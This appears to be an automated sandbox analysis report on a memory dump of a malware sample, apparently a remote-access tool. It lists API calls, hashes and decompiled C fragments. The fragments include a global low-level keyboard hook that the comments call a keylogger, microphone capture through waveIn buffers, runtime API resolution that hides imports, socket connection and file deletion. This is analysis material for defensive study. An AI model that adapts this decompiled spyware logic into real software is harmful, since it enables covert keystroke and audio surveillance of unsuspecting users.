                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                        • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                        • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 25%
                                        			E00406CFF(WCHAR* __eax, void* __ecx) {
                                        				WCHAR* _t5;
                                        				signed int _t8;
                                        				signed int _t9;
                                        				void* _t15;
                                        
                                        				_t15 = __ecx;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t5 = DeleteFileW(__eax);
                                        				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
                                        				if(_t5 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					RemoveDirectoryW(_t5);
                                        				}
                                        				return _t9;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                        • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                        • String ID:
                                        • API String ID: 1823182134-0
                                        • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                        • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0040D7E4(void* __eflags) {
                                        				char* _t5;
                                        				void* _t19;
                                        
                                        				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				CloseWindow(atoi(_t5));
                                        				E004017DD(_t19 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                        • atoi.MSVCRT ref: 0040D7F7
                                        • CloseWindow.USER32 ref: 0040D7FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                        • String ID:
                                        • API String ID: 14144500-0
                                        • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                        • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                        • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                        • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1976170855-0
                                        • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                        • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: KeepAlive Disabled!$[WARNING]
                                        • API String ID: 2944585167-3856563802
                                        • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                        • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                        • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                        • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                          • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 004018A2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 1986322901-3016609489
                                        • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                        • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 00405019
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 3609083747-3016609489
                                        • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                        • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00412019() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				// Resolves the User32 export at run time instead of through the import table and
                                        				// caches the pointer in the global at 0x41c1dc; _Unknown_base(*)() is the decompiler's
                                        				// placeholder type for the function pointer.
                                        				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                        				 *0x41c1dc = _t2;
                                        				return _t2;
                                        			}

                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                        • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040F4AE() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				// Same pattern as E00412019, but via GetModuleHandleA, which does not load the DLL:
                                        				// it returns NULL if User32 is not already mapped, so the lookup fails in that case.
                                        				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                        				 *0x41bf1c = _t2;
                                        				return _t2;
                                        			}

                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll
                                        • API String ID: 1646373207-2714051624
                                        • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                        • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00413AED() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				// GetConsoleWindow is resolved at run time and cached at 0x41c1f8, keeping it out of
                                        				// the static import table like the two User32 lookups above.
                                        				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                        				 *0x41c1f8 = _t2;
                                        				return _t2;
                                        			}

                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                        • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetConsoleWindow$kernel32.dll
                                        • API String ID: 2574300362-100875112
                                        • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                        • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                        				int _v8;
                                        				int _v12;
                                        				char* _t31;
                                        				signed int _t36;
                                        				signed int _t37;
                                        				void* _t46;
                                        
                                        				_v8 = 0;
                                        				_t31 = 0x415664; // fallback source pointer (constant at 0x415664) used when the size query fails
                                        				// First call with lpData == NULL only asks for the size of the value (_v8).
                                        				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                        					_t31 = malloc(_v8);
                                        					_t36 = _v8;
                                        					_t46 = _t31;
                                        					_t37 = _t36 >> 2;
                                        					// The decompiler's rendering of the rep stosd / rep stosb zeroing idiom: _v8 bytes are
                                        					// cleared in dword chunks, then the remaining (_v8 & 3) bytes; the pointer arithmetic is its approximation.
                                        					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                        					// Second call reads the data. Neither the return value nor the value type (_v12) is checked.
                                        					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                        				}
                                        				// The raw bytes are wrapped as an MSVCP60 basic_string<wchar_t> (std::wstring) returned through _a4.
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                        				return _a4;
                                        			}

                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                        • malloc.MSVCRT ref: 0040B64B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                        • String ID:
                                        • API String ID: 3506253819-0
                                        • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                        • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 182292213-0
                                        • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                        • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00401181(void* __eflags, signed int _a4) {
                                        				intOrPtr _t16;
                                        				intOrPtr _t17;
                                        				intOrPtr _t19;
                                        				intOrPtr _t22;
                                        				intOrPtr _t28;
                                        				intOrPtr _t29;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				intOrPtr _t32;
                                        				intOrPtr _t33;
                                        				signed int _t36;
                                        
                                        				_t38 = __eflags;
                                        				E0040180C(0x41b200, __eflags, _a4);
                                        				// Grow the per-buffer std::string (element _a4 of the array at 0x41b200) to the
                                        				// capture size stored at 0x41b1d4; its buffer becomes the recording target.
                                        				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                        				_t36 = _a4 << 5; // _a4 * 0x20: index into an array of 32-byte WAVEHDR structures at *0x41b1dc
                                        				_t16 = E0040180C(0x41b200, _t38, _a4);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t28 =  *0x41b1dc; // 0x2ea2948
                                        				 *((intOrPtr*)(_t36 + _t28)) = _t16;       // WAVEHDR.lpData = string buffer
                                        				_t17 =  *0x41b1dc; // 0x2ea2948
                                        				_t29 =  *0x41b1d4; // 0x0
                                        				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;   // WAVEHDR.dwBufferLength
                                        				_t30 =  *0x41b1dc; // 0x2ea2948
                                        				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;      // WAVEHDR.dwBytesRecorded
                                        				_t31 =  *0x41b1dc; // 0x2ea2948
                                        				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;    // WAVEHDR.dwUser
                                        				_t32 =  *0x41b1dc; // 0x2ea2948
                                        				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;   // WAVEHDR.dwFlags
                                        				_t33 =  *0x41b1dc; // 0x2ea2948
                                        				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;   // WAVEHDR.dwLoops
                                        				_t19 =  *0x41b1dc; // 0x2ea2948
                                        				// *0x41b198 is the HWAVEIN handle; 0x20 == sizeof(WAVEHDR). Once prepared and added,
                                        				// the header is filled with microphone data by the waveIn driver.
                                        				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                        				_t22 =  *0x41b1dc; // 0x2ea2948
                                        				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                        			}

                                        APIs
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                        • waveInPrepareHeader.WINMM(02EA2948,00000020,?,?,0040116A,00000000), ref: 0040120D
                                        • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                        • String ID:
                                        • API String ID: 1952094867-0
                                        • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                        • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004052D5(intOrPtr* __ecx) {
                                        				struct tagMSG _v32;
                                        				intOrPtr* _t14;
                                        
                                        				_t14 = __ecx;
                                        				 *0x41b9a8 = __ecx;
                                        				if( *__ecx != 0) {
                                        					L3:
                                        					// A low-level hook callback is only delivered while the installing thread pumps
                                        					// messages, so this GetMessage loop is what keeps the keylogger hook alive.
                                        					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                        						TranslateMessage( &_v32);
                                        						DispatchMessageA( &_v32);
                                        						goto L2;
                                        					}
                                        				} else {
                                        					// 0xd == WH_KEYBOARD_LL: a global low-level keyboard hook. E004052BA is the
                                        					// LowLevelKeyboardProc callback that receives keyboard events for the whole desktop.
                                        					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0);
                                        					L2:
                                        					if( *_t14 != 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchHookTranslateWindows
                                        • String ID:
                                        • API String ID: 1978648212-0
